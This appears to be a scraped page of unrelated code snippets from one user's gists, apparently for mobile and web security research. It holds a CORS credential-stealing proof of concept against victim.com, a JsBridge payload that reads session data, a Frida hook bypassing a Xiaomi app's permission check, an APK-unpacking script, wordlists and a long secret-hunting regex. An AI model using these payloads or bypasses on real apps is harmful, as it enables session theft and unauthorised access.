michaellcader

# GET Method
<script type="text/javascript">
var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open("get","victim.com/getUserInfo",true);
req.withCredentials = true;
req.send();
function reqListener(){alert(req.responseText);}
</script>

michaellcader

# coding: utf-8
# py2 origin author lrdcq
# usage python3 unwxapkg.py filename

__author__ = 'Integ: https://github.com./integ'

import sys, os
import struct

class WxapkgFile(object):

michaellcader

<html>
  <body>
    <script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory
      JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code
                        var i = {};
                        i = a;
                        window.alert(JSON.stringify(i);
                    })
    </script>
  </body>

michaellcader

Java.perform(function() {
	console.log("Starting hook");

	var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager");
    Activity.isValid.implementation = function () {
        return true;
    };

	Java.choose("com.xiaomi.music.hybrid.internal.Config", {
	  onMatch: function(inst) {

michaellcader

private String config(Config config, boolean z) {
        if (z) {
            SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext());
            if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object
                return new Response(202).toString();
            }
        }
        this.mFM = new FeatureManager(config, this.mActivity.getClassLoader());
        this.mPM = new PermissionManager(config);
        return new Response(0).toString();

michaellcader

In android source code can get

<activity android:name=".PackageInstallerActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <data android:scheme="content" />
        <data android:scheme="file" />

michaellcader

0
00
01
02
03
1
1.0
10
100
1000

michaellcader

proxies:
  - name: Charles
    type: socks5
    server: 127.0.0.1  
    port: 8889  
  - name: v2ray
    type: socks5
    server: 127.0.0.1  
    port: 10809 
proxy-groups:

michaellcader

proxies:
  - name: Charles
    type: socks5
    server: 127.0.0.1  
    port: 8889  
  - name: v2ray
    type: socks5
    server: 127.0.0.1  
    port: 10809 
proxy-groups:

michaellcader

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k